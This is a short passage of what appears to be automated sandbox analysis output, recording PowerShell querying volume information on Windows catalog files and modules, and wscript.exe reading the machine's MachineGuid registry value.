Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid